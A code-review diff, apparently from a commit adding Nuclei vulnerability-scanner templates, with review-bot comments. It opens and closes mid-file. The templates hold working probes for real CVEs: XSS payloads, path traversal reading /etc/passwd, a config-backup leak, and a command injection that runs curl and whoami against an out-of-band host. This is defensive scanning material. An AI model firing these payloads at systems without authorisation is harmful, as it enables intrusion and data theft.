     40 + 
     41 + - type: status
     42 + status:
     43 + - 200
     44 + 
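Review bot: `classification` carries `cvss-metrics`, `cvss-score` and `cve-id` but no `cwe-id`, unlike every other CVE template in this change; the description ("accessed directly without authentication") points at a missing-authentication weakness, so add the matching CWE. The body matcher on `src='menu.js?v=\"+Math.random()+\"'></scr\"+\"ipt>\");` is also brittle against any change in the page's script loader; pairing it with `var ipv6conntype` under `condition: and` helps, but a short comment explaining why that exact string was chosen would help maintainers.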
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-0150.yaml
     1 +id: CVE-2022-0150
     2 + 
     3 +info:
     4 + name: WP Accessibility Helper (WAH) < 0.6.0.7 - Cross-Site Scripting (XSS)
     5 + author: dhiyaneshDK
     6 + severity: medium
     7 + description: |
     8 + The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue.
     9 + reference:
     10 + - https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0150
     12 + - https://plugins.trac.wordpress.org/changeset/2661008
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     15 + cvss-score: 6.1
     16 + cve-id: CVE-2022-0150
     17 + cwe-id: CWE-79
     18 + tags: cve,cve2022,xss,wordpress,wp-plugin,wp
     19 + 
     20 +requests:
     21 + - method: GET
     22 + path:
     23 + - '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
     24 + 
     25 + matchers-condition: and
     26 + matchers:
     27 + - type: word
     28 + part: body
     29 + words:
     30 + - "var wah_target_src = '';alert(document.domain);//';"
     31 + 
     32 + - type: word
     33 + part: header
     34 + words:
     35 + - text/html
     36 + 
     37 + - type: status
     38 + status:
     39 + - 200
     40 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-0220.yaml
     1 +id: CVE-2022-0220
     2 + 
     3 +info:
     4 + name: WordPress GDPR & CCPA < 1.9.27 - Unauthenticated Reflected Cross-Site Scripting
     5 + author: daffainfo
     6 + severity: medium
     7 + description: |
     8 + The check_privacy_settings AJAX action of the WordPress GDPR WordPress plugin before 1.9.27, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type. Since an HTML payload isn't properly escaped, it may be interpreted by a web browser led to this endpoint. Javascript code may be executed on a victim's browser. Due to v1.9.26 adding a CSRF check, the XSS is only exploitable against unauthenticated users (as they all share the same nonce)
     9 + reference:
     10 + - https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0220
     12 + classification:
     13 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     14 + cvss-score: 6.1
     15 + cve-id: CVE-2022-0220
     16 + cwe-id: CWE-79
     17 + tags: cve,cve2022,wordpress,wp-plugin,wp,xss
     18 + 
     19 +requests:
     20 + - raw:
     21 + - |
     22 + GET /wp-admin HTTP/1.1
     23 + Host: {{Hostname}}
     24 + 
     25 + - |
     26 + POST /wp-admin/admin-ajax.php HTTP/1.1
     27 + Host: {{Hostname}}
     28 + Content-Type: application/x-www-form-urlencoded
     29 + 
     30 + action=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}
     31 + 
     32 + redirects: true
     33 + max-redirects: 2
     34 + req-condition: true
     35 + matchers:
     36 + - type: dsl
     37 + dsl:
     38 + - "contains(all_headers_2, 'text/html')"
     39 + - "status_code_2 == 200"
     40 + - "contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"
     41 + condition: and
     42 + 
     43 + extractors:
     44 + - type: regex
     45 + name: nonce
     46 + part: body
     47 + group: 1
     48 + regex:
     49 + - 'nonce":"([0-9a-z]+)'
     50 + internal: true
     51 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-0928.yaml
     1 +id: CVE-2022-0928
     2 + 
     3 +info:
     4 + name: Microweber - Cross-site Scripting
     5 + author: amit-jd
     6 + severity: medium
     7 + description: |
     8 + Cross-site Scripting (XSS) discovered in microweber prior to 1.2.12. Type parameter in the body of POST request triggered by add/edit tax in microweb are vulnerable to stored XSS.
     9 + reference:
     10 + - https://huntr.dev/bounties/085aafdd-ba50-44c7-9650-fa573da29bcd
     11 + - https://github.com/microweber/microweber/commit/fc9137c031f7edec5f50d73b300919fb519c924a
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0928
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
     15 + cvss-score: 5.4
     16 + cve-id: CVE-2022-0928
     17 + cwe-id: CWE-79
     18 + metadata:
     19 + verified: "true"
     20 + tags: cve,cve2022,xss,microweber,cms,authenticated
     21 + 
     22 +requests:
     23 + - raw:
     24 + - |
     25 + POST /api/user_login HTTP/1.1
     26 + Host: {{Hostname}}
     27 + Content-Type: application/x-www-form-urlencoded
     28 + 
     29 + username={{username}}&password={{password}}
     30 + 
     31 + - |
     32 + POST /api/shop/save_tax_item HTTP/1.1
     33 + Host: {{Hostname}}
     34 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     35 + Referer: {{BaseURL}}/admin/view:settings
     36 + 
     37 + id=0&name=vat1&type="><img+src%3dx+onerror%3dalert(document.domain)>&rate=10
     38 + 
     39 + - |-
     40 + POST /module HTTP/1.1
     41 + Host: {{Hostname}}
     42 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     43 + Referer:{{BaseURL}}/admin/view:settings
     44 + 
     45 + class=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes
     46 + 
     47 + req-condition: true
     48 + cookie-reuse: true
     49 + matchers:
     50 + - type: dsl
     51 + dsl:
     52 + - contains(body_3,'<td>\"><img src=x onerror=alert(document.domain)></td>')
     53 + - 'contains(all_headers_3,"text/html")'
     54 + - 'status_code==200'
     55 + condition: and
     56 + 
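Review bot: with `req-condition: true`, two of the three DSL conditions are pinned to the third response (`body_3`, `all_headers_3`) while the last is an unsuffixed `status_code==200`; make it `status_code_3==200` so all three refer to the same response. Two smaller points in the same hunk: line 43 has `Referer:{{BaseURL}}` without the space that line 35 uses, and the `{{username}}`/`{{password}}` placeholders are undeclared and undocumented.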
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-1390.yaml
     1 +id: CVE-2022-1390
     2 + 
     3 +info:
     4 + name: WordPress Admin Word Count Column 2.2 - Local File Inclusion
     5 + author: daffainfo,Splint3r7
     6 + severity: critical
     7 + description: |
     8 + The plugin does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique.
     9 + reference:
     10 + - https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
     11 + - https://wordpress.org/plugins/admin-word-count-column/
     12 + - https://wpscan.com/vulnerability/6293b319-dc4f-4412-9d56-55744246c990
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1390
     14 + classification:
     15 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     16 + cvss-score: 9.8
     17 + cve-id: CVE-2022-1390
     18 + cwe-id: CWE-22
     19 + tags: cve,cve2022,wordpress,wp-plugin,lfi,wp
     20 + 
     21 +requests:
     22 + - method: GET
     23 + path:
     24 + - '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'
     25 + 
     26 + matchers-condition: and
     27 + matchers:
     28 + - type: regex
     29 + regex:
     30 + - "root:[x*]:0:0"
     31 + 
     32 + - type: status
     33 + status:
     34 + - 200
     35 + 
     36 +# Enhanced by mp on 2022/08/01
     37 + 
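Review bot: the path ends in `etc/passwd\0` inside a single-quoted YAML scalar, where `\0` is the two characters backslash and zero rather than a NUL, so the request does not exercise the "null byte technique" the description says the check depends on. The sibling template CVE-2022-1391 in this same change spells the terminator as `%00`; either align the encoding or reword the description so the precondition is stated correctly.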
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-1391.yaml
     1 +id: CVE-2022-1391
     2 + 
     3 +info:
     4 + name: WordPress Cab fare calculator < 1.0.4 - Local File Inclusion
     5 + author: Splint3r7
     6 + severity: critical
     7 + description: |
     8 + The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.
     9 + reference:
     10 + - https://www.exploit-db.com/exploits/50843
     11 + - https://wordpress.org/plugins/cab-fare-calculator
     12 + - https://wpscan.com/vulnerability/680121fe-6668-4c1a-a30d-e70dd9be5aac
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1391
     14 + classification:
     15 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     16 + cvss-score: 9.8
     17 + cve-id: CVE-2022-1391
     18 + cwe-id: CWE-22
     19 + tags: cve,cve2022,wordpress,wp-plugin,lfi,wp
     20 + 
     21 +requests:
     22 + - method: GET
     23 + path:
     24 + - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1'
     25 + 
     26 + matchers-condition: and
     27 + matchers:
     28 + - type: regex
     29 + regex:
     30 + - "root:[x*]:0:0"
     31 + 
     32 + - type: status
     33 + status:
     34 + - 200
     35 + 
     36 +# Enhanced by mp on 2022/08/01
     37 + 
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-24112.yaml
    skipped 40 lines
    41 41   {
    42 42   "method":"PUT",
    43 43   "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1",
    44  - "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl https://{{interactsh-url}}/`whoami`'); return true end\"}"
     44 + "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl{{interactsh-url}}/`whoami`'); return true end\"}"
    45 45   }
    46 46   ]
    47 47   }
    skipped 34 lines
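Review bot: the rewritten `filter_func` reads `os.execute('curl{{interactsh-url}}/`whoami`')`; removing `https://` is consistent with the rest of this change, but the space between `curl` and the URL was removed as well, so the Lua string no longer invokes `curl` and the out-of-band interaction the template waits for cannot happen. Restore the separator as in `curl%20{{interactsh-url}}` (CVE-2021-33357) elsewhere in this commit.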
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-34045.yaml
     1 +id: CVE-2022-34045
     2 + 
     3 +info:
     4 + name: Wavlink WN530HG4 - Access Control
     5 + author: arafatansari
     6 + severity: critical
     7 + description: |
     8 + Wavlink WN530HG4 M30HG4.V5030.191116 was discovered to contain a hardcoded encryption/decryption key for its configuration files at /etc_ro/lighttpd/www/cgi-bin/ExportAllSettings.sh.
     9 + reference:
     10 + - https://drive.google.com/file/d/1s5uZGC_iSzfCJt9BJ8h-P24vmsrmttrf/view?usp=sharing
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-34045
     12 + classification:
     13 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     14 + cvss-score: 9.8
     15 + cve-id: CVE-2022-34045
     16 + cwe-id: CWE-798
     17 + metadata:
     18 + shodan-query: http.html:"WN530HG4"
     19 + verified: "true"
     20 + tags: cve,cve2022,wavlink,exposure
     21 + 
     22 +requests:
     23 + - raw:
     24 + - |
     25 + GET /backupsettings.dat HTTP/1.1
     26 + Host: {{Hostname}}
     27 + 
     28 + matchers-condition: and
     29 + matchers:
     30 + - type: word
     31 + part: body
     32 + words:
     33 + - 'Salted__'
     34 + 
     35 + - type: word
     36 + part: header
     37 + words:
     38 + - application/octet-stream
     39 + 
     40 + - type: status
     41 + status:
     42 + - 200
     43 + 
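Review bot: this template's request and matchers (`GET /backupsettings.dat`, body `Salted__`, header `application/octet-stream`, status 200) are identical to CVE-2020-10973 added in the same change, so both will always fire together, once at `severity: high` and once at `severity: critical`. Either distinguish them (the description here is about a hardcoded key in `ExportAllSettings.sh`, a different weakness than the 2020 access-control issue) or merge them into one template that lists both CVE ids.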
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-35151.yaml
     1 +id: CVE-2022-35151
     2 + 
     3 +info:
     4 + name: kkFileView v4.1.0 - Cross Site Scripting
     5 + author: arafatansari
     6 + severity: medium
     7 + description: |
     8 + kkFileView v4.1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
     9 + reference:
     10 + - https://github.com/kekingcn/kkFileView/issues/366
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-35151
     12 + classification:
     13 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     14 + cvss-score: 6.1
     15 + cve-id: CVE-2022-35151
     16 + cwe-id: CWE-79
     17 + metadata:
     18 + shodan-query: http.html:"kkFileView"
     19 + verified: "true"
     20 + tags: cve,cve2022,xss,kkfileview
     21 + 
     22 +requests:
     23 + - raw:
     24 + - |
     25 + GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1
     26 + Host: {{Hostname}}
     27 + 
     28 + matchers-condition: and
     29 + matchers:
     30 + - type: word
     31 + part: body
     32 + words:
     33 + - '<svg/onload=alert(document.domain)>'
     34 + - '图片预览'
     35 + condition: and
     36 + 
     37 + - type: word
     38 + part: header
     39 + words:
     40 + - text/html
     41 + 
     42 + - type: status
     43 + status:
     44 + - 200
     45 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-37153.yaml
     1 +id: CVE-2022-37153
     2 + 
     3 +info:
     4 + name: Artica Proxy - Cross Site Scripting
     5 + author: arafatansari
     6 + severity: medium
     7 + description: |
     8 + An issue was discovered in Artica Proxy 4.30.000000. There is a XSS vulnerability via the password parameter in /fw.login.php.
     9 + reference:
     10 + - https://github.com/Fjowel/CVE-2022-37153
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-37153
     12 + classification:
     13 + cve-id: CVE-2022-37153
     14 + metadata:
     15 + verified: true
     16 + shodan-query: http.html:"Artica"
     17 + tags: cve,cve2022,xss,artica
     18 + 
     19 +requests:
     20 + - raw:
     21 + - |
     22 + POST /fw.login.php HTTP/1.1
     23 + Host: {{Hostname}}
     24 + Content-Type: application/x-www-form-urlencoded
     25 + 
     26 + userfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
     27 + 
     28 + matchers-condition: and
     29 + matchers:
     30 + - type: word
     31 + part: body
     32 + words:
     33 + - 'Password" value="admin"><script>alert(document.domain)</script>'
     34 + - 'Artica Web'
     35 + condition: and
     36 + 
     37 + - type: word
     38 + part: header
     39 + words:
     40 + - text/html
     41 + 
     42 + - type: status
     43 + status:
     44 + - 200
     45 + 
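Review bot: `classification` contains only `cve-id`; the other CVE templates in this change also supply `cvss-metrics`, `cvss-score` and `cwe-id`, and the description ("a XSS vulnerability via the password parameter") makes the CWE obvious. Fill those in, and note that `verified: true` here is an unquoted boolean whereas most templates in the commit use `verified: "true"`.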
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/avideo-install.yaml
     1 +id: avideo-install
     2 + 
     3 +info:
     4 + name: Avideo Installation Setup
     5 + author: ritikchaddha
     6 + severity: high
     7 + metadata:
     8 + verified: true
     9 + shodan-query: http.title:"AVideo"
     10 + fofa-query: "AVideo"
     11 + tags: panel,install,avideo
     12 + 
     13 +requests:
     14 + - method: GET
     15 + path:
     16 + - "{{BaseURL}}/install/index.php"
     17 + 
     18 + matchers-condition: and
     19 + matchers:
     20 + - type: word
     21 + part: body
     22 + words:
     23 + - '<title>Install AVideo</title>'
     24 + 
     25 + - type: status
     26 + status:
     27 + - 200
     28 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/openvz-web-login.yaml
     1 +id: openvz-web-login
     2 + 
     3 +info:
     4 + name: Openvz Web Panel Login
     5 + author: nullfuzz
     6 + severity: info
     7 + description: |
     8 + OpenVZ Web Panel is a GUI web-based frontend for controlling of the physical and virtual servers with the OpenVZ virtualization technology.
     9 + reference:
     10 + - https://github.com/sibprogrammer/owp
     11 + metadata:
     12 + verified: true
     13 + shodan-query: http.favicon.hash:-1898583197
     14 + tags: panel,openvz
     15 + 
     16 +requests:
     17 + - method: GET
     18 + path:
     19 + - "{{BaseURL}}"
     20 + 
     21 + matchers:
     22 + - type: dsl
     23 + dsl:
     24 + - 'status_code == 200'
     25 + - 'contains(body, "Login - OpenVZ Web Panel")'
     26 + condition: and
     27 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/zimbra-web-login.yaml
     1 +id: zimbra-web-login
     2 + 
     3 +info:
     4 + name: Zimbra Collaboration Suite Web Client - Sign In
     5 + author: powerexploit
     6 + severity: info
     7 + description: |
     8 + Zimbra Collaboration Suite simplifies the communication environment, connects people over multiple channels, and provides a single place to manage collaboration and communication.
     9 + reference:
     10 + - https://www.zimbra.com/
     11 + metadata:
     12 + verified: true
     13 + shodan-query: http.title:"Zimbra Collaboration Suite"
     14 + tags: panel,zimbra
     15 + 
     16 +requests:
     17 + - method: GET
     18 + path:
     19 + - "{{BaseURL}}"
     20 + 
     21 + redirects: true
     22 + max-redirects: 2
     23 + matchers-condition: and
     24 + matchers:
     25 + - type: word
     26 + part: body
     27 + words:
     28 + - "Zimbra Collaboration Suite Log In"
     29 + - "Zimbra Web Client Sign In"
     30 + - "Zimbra Web Client Log In"
     31 + condition: or
     32 + 
     33 + - type: status
     34 + status:
     35 + - 200
     36 + 
     37 + extractors:
     38 + - type: regex
     39 + part: body
     40 + group: 1
     41 + regex:
     42 + - 'v=([0-9]+)'
     43 + 
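Review bot: the extractor regex `v=([0-9]+)` at line 42 captures the first `v=<digits>` anywhere in the body, which is the shape of an ordinary cache-busting query string, so the reported "version" may be unrelated to the Zimbra build. Anchor the pattern to the Zimbra-specific asset path that carries the build number, or give the extractor a `name:` and treat its output as informational only.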
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposures/configs/django-variables-exposed.yaml
     1 +id: django-variables-exposed
     2 + 
     3 +info:
     4 + name: Exposed Django variables
     5 + author: nobody
     6 + severity: info
     7 + description: Detects suspicious Django web application framework exceptions that could indicate exploitation attempts
     8 + reference:
     9 + - https://docs.djangoproject.com/en/1.11/ref/exceptions/
     10 + - https://docs.djangoproject.com/en/1.11/topics/logging/#django-security
     11 + - https://github.com/projectdiscovery/nuclei-templates/blob/master/file/logs/django-framework-exceptions.yaml
     12 + metadata:
     13 + verified: true
     14 + tags: exposure,config,django
     15 + 
     16 +requests:
     17 + - method: GET
     18 + path:
     19 + - "{{BaseURL}}"
     20 + 
     21 + matchers-condition: and
     22 + matchers:
     23 + - type: word
     24 + words:
     25 + - 'seeing this error because you have <code>DEBUG = True</code>'
     26 + - 'SuspiciousOperation'
     27 + - 'DisallowedHost'
     28 + - 'DisallowedModelAdminLookup'
     29 + - 'DisallowedModelAdminToField'
     30 + - 'DisallowedRedirect'
     31 + - 'InvalidSessionKey'
     32 + - 'RequestDataTooBig'
     33 + - 'SuspiciousFileOperation'
     34 + - 'SuspiciousMultipartForm'
     35 + - 'SuspiciousSession'
     36 + - 'TooManyFieldsSent'
     37 + - 'PermissionDenied'
     38 + condition: or
     39 + 
     40 + - type: word
     41 + part: header
     42 + words:
     43 + - "text/html"
     44 + 
     45 + - type: status
     46 + status:
     47 + - 400
     48 + 
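Review bot: the status matcher at lines 45-47 only accepts 400, but most strings in the word list at lines 24-37 are served with other codes: Django returns its `DEBUG = True` technical page with 500 for unhandled exceptions (and 404 for its debug 404 page), `PermissionDenied` with 403, and only the `SuspiciousOperation` family such as `DisallowedHost` with 400. Either list the codes that apply or drop the status matcher and rely on the body and `text/html` checks. The description on line 7 is also copied from the log-file template referenced on line 11 and describes log analysis, not the HTTP exposure this template detects.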
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/apache/tomcat-pathnormalization.yaml
     1 +id: tomcat-manager-pathnormalization
     2 + 
     3 +info:
     4 + name: Tomcat Manager Path Normalization
     5 + author: brenocss,organiccrap
     6 + severity: info
     7 + description: A Tomcat Manager login panel was discovered via path normalization. Normalizing a path involves modifying the string that identifies a path or file so that it conforms to a valid path on the target operating system.
     8 + reference: https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
     9 + classification:
     10 + cwe-id: CWE-200
     11 + tags: panel,tomcat,apache
     12 + 
     13 +requests:
     14 + - method: GET
     15 + path:
     16 + - '{{BaseURL}}/..;/manager/html'
     17 + - '{{BaseURL}}/..;/host-manager/html'
     18 + - '{{BaseURL}}/{{randstr}}/..;/manager/html'
     19 + - '{{BaseURL}}/{{randstr}}/..;/host-manager/html'
     20 + 
     21 + matchers-condition: and
     22 + matchers:
     23 + - type: word
     24 + words:
     25 + - 'username="tomcat" password="s3cret"'
     26 + - 'manager-gui'
     27 + condition: and
     28 + 
     29 + - type: status
     30 + negative: true
     31 + status:
     32 + - 403
     33 + 
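Review bot: the id `tomcat-manager-pathnormalization` on line 1 does not match the file name `tomcat-pathnormalization.yaml`; nuclei templates keep the two identical. Line 8 also gives `reference:` as a bare scalar, whereas every other template in this commit uses a list under `reference:`; use the list form for consistency.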
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/shell-history.yaml
    skipped 4 lines
    5 5   author: pentest_swissky,geeknik
    6 6   severity: low
    7 7   description: Discover history for bash, ksh, sh, and zsh
    8  - tags: config
     8 + tags: misconfig
    9 9  
    10 10  requests:
    11 11   - method: GET
    12  - redirects: true
    13 12   max-redirects: 1
    14 13   path:
    15 14   - "{{BaseURL}}/.bash_history"
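Review bot: removing `redirects: true` at line 12 while keeping `max-redirects: 1` at line 13 leaves a setting with nothing to act on. If the intent is to stop following redirects (so a 302 to a login page is not matched as a history file), drop `max-redirects` as well; if not, the removal should be reverted.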
    skipped 18 lines
    34 33   - "ps aux "
    35 34   condition: or
    36 35  
    37  - - type: status
    38  - status:
    39  - - 200
    40  -
    41 36   - type: word
    42 37   words:
    43 38   - "<?xml"
    skipped 6 lines
    50 45   part: response
    51 46   negative: true
    52 47  
     48 + - type: status
     49 + status:
     50 + - 200
     51 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/springboot/springboot-liquidbase.yaml
     1 +id: springboot-liquidbase
     2 + 
     3 +info:
     4 + name: Springboot Liquidbase API
     5 + author: ELSFA7110
     6 + severity: low
     7 + description: This liquibase endpoint provides information about database changes
     8 + reference:
     9 + - https://docs.spring.io/spring-boot/docs/current/actuator-api/htmlsingle/#liquibase
     10 + metadata:
     11 + verified: true
     12 + tags: misconfig,springboot,exposure,liquibase
     13 + 
     14 +requests:
     15 + - method: GET
     16 + path:
     17 + - "{{BaseURL}}/liquibase"
     18 + - "{{BaseURL}}/actuator/liquibase"
     19 + 
     20 + stop-at-first-match: true
     21 + matchers-condition: and
     22 + matchers:
     23 + - type: word
     24 + part: body
     25 + words:
     26 + - 'liquibase'
     27 + - '"FILENAME":"'
     28 + condition: and
     29 + 
     30 + - type: word
     31 + part: header
     32 + words:
     33 + - "application/json"
     34 + - "application/vnd.spring-boot.actuator"
     35 + - "application/vnd.spring-boot.actuator.v1+json"
     36 + - "application/vnd.spring-boot.actuator.v2+json"
     37 + condition: or
     38 + 
     39 + - type: status
     40 + status:
     41 + - 200
     42 + 
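Review bot: the id `springboot-liquidbase` (line 1), the file name and the name "Springboot Liquidbase API" (line 4) misspell Liquibase, while the reference on line 9, the tag on line 12 and the paths on lines 17-18 all spell it `liquibase`. Rename the id, name and file to the correct spelling before this lands, since the id is what users filter on.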
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/technologies/avideo-detect.yaml
     1 +id: avideo-detect
     2 + 
     3 +info:
     4 + name: Avideo Detect
     5 + author: pikpikcu
     6 + severity: info
     7 + metadata:
     8 + verified: true
     9 + shodan-query: http.title:"AVideo"
     10 + fofa-query: "AVideo"
     11 + tags: tech,avideo
     12 + 
     13 +requests:
     14 + - method: GET
     15 + path:
     16 + - "{{BaseURL}}"
     17 + 
     18 + redirects: true
     19 + max-redirects: 2
     20 + matchers-condition: and
     21 + matchers:
     22 + - type: regex
     23 + part: body
     24 + regex:
     25 + - '<title>(.*)AVideo(.*)</title>'
     26 + - 'AVideo Analytics'
     27 + condition: or
     28 + 
     29 + - type: word
     30 + part: header
     31 + words:
     32 + - "/install/index.php"
     33 + negative: true
     34 + 
     35 + - type: status
     36 + status:
     37 + - 200
     38 + 
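Review bot: with `redirects: true` (line 18) the matchers are evaluated against the final response, so the negative header check for `/install/index.php` at lines 29-33 does not exclude an unconfigured instance that redirects to its installer; after the hop the install page itself is the final response, and its `<title>Install AVideo</title>` still satisfies the regex on line 25. If the goal is to leave fresh installs to avideo-install.yaml from this same commit, a negative body match on that title string is the more reliable check.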
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/technologies/openethereum-server-detect.yaml
     1 +id: openethereum-server
     2 + 
     3 +info:
     4 + name: OpenEthereum JSON-RPC HTTP Server Detect
     5 + author: Nullfuzz
     6 + severity: info
     7 + description: |
     8 + OpenEthereum is the fastest, lightest, and most "secure" Ethereum client. By default OpenEthereum runs a JSON-RPC HTTP server on port 8545/TCP
     9 + reference:
     10 + - https://github.com/openethereum/openethereum
     11 + - https://openethereum.github.io/
     12 + metadata:
     13 + shodan-query: product:OpenEthereum
     14 + tags: tech,openethereum,ethereum,web3,blockchain
     15 + 
     16 +requests:
     17 + - raw:
     18 + - |
     19 + POST / HTTP/1.1
     20 + Host: {{Hostname}}
     21 + Content-Type: application/json
     22 + Content-Length: 66
     23 + 
     24 + {"method":"web3_clientVersion","params":[],"id":1,"jsonrpc":"2.0"}
     25 + 
     26 + matchers:
     27 + - type: dsl
     28 + dsl:
     29 + - 'status_code == 200'
     30 + - 'contains(all_headers, "application/json")'
     31 + - 'contains(body, "OpenEthereum")'
     32 + condition: and
     33 + 
     34 + extractors:
     35 + - type: regex
     36 + part: body
     37 + group: 1
     38 + regex:
     39 + - '(v[0-9a-z-_.]+)'
     40 + 
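Review bot: the hardcoded `Content-Length: 66` at line 22 is correct for the body on line 24 today, but nuclei fills in Content-Length for raw requests itself, so the explicit header is redundant and silently becomes wrong the moment the JSON is edited; drop it. Minor points: the author is `Nullfuzz` here and `nullfuzz` in openvz-web-login.yaml in this same commit, and the description on line 8 ends without a period and its scare-quoted "secure" reads as editorial rather than descriptive.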
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml
     1 +id: gnuboard-sms-xss
     2 + 
     3 +info:
     4 + name: Gnuboard CMS - SMS Emoticon XSS
     5 + author: gy741
     6 + severity: medium
     7 + description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
     8 + reference:
     9 + - https://sir.kr/g5_pds/4788?page=5
     10 + - https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
     11 + metadata:
     12 + verified: true
     13 + shodan-query: http.html:"Gnuboard"
     14 + tags: xss,gnuboard
     15 + 
     16 +requests:
     17 + - method: GET
     18 + path:
     19 + - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)>"
     20 + 
     21 + matchers-condition: and
     22 + matchers:
     23 + - type: word
     24 + part: body
     25 + words:
     26 + - '"0nuboard<svg onload=alert(document.domain)>"'
     27 + 
     28 + - type: word
     29 + part: header
     30 + words:
     31 + - "text/html"
     32 + 
     33 + - type: status
     34 + status:
     35 + - 200
     36 + 
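Review bot: the matcher at line 26 expects `"0nuboard<svg onload=alert(document.domain)>"` while the request at line 19 sends `gnuboard<svg+onload=...>`. Unless the emoticon endpoint really rewrites the leading `g` to `0`, this template never fires; confirm the transformation against the reference on line 9, and if it is not guaranteed, match on the reflected `<svg onload=alert(document.domain)>` fragment instead.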
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/gnuboard/gnuboard5-rxss.yaml
     1 +id: gnuboard5-rxss
     2 + 
     3 +info:
     4 + name: Gnuboard5 - Cross Site Scripting
     5 + author: arafatansari
     6 + severity: medium
     7 + description: |
     8 + Gnuboard 5 is vulnerable to reflected XSS via $_GET['LGD_OID'].
     9 + reference:
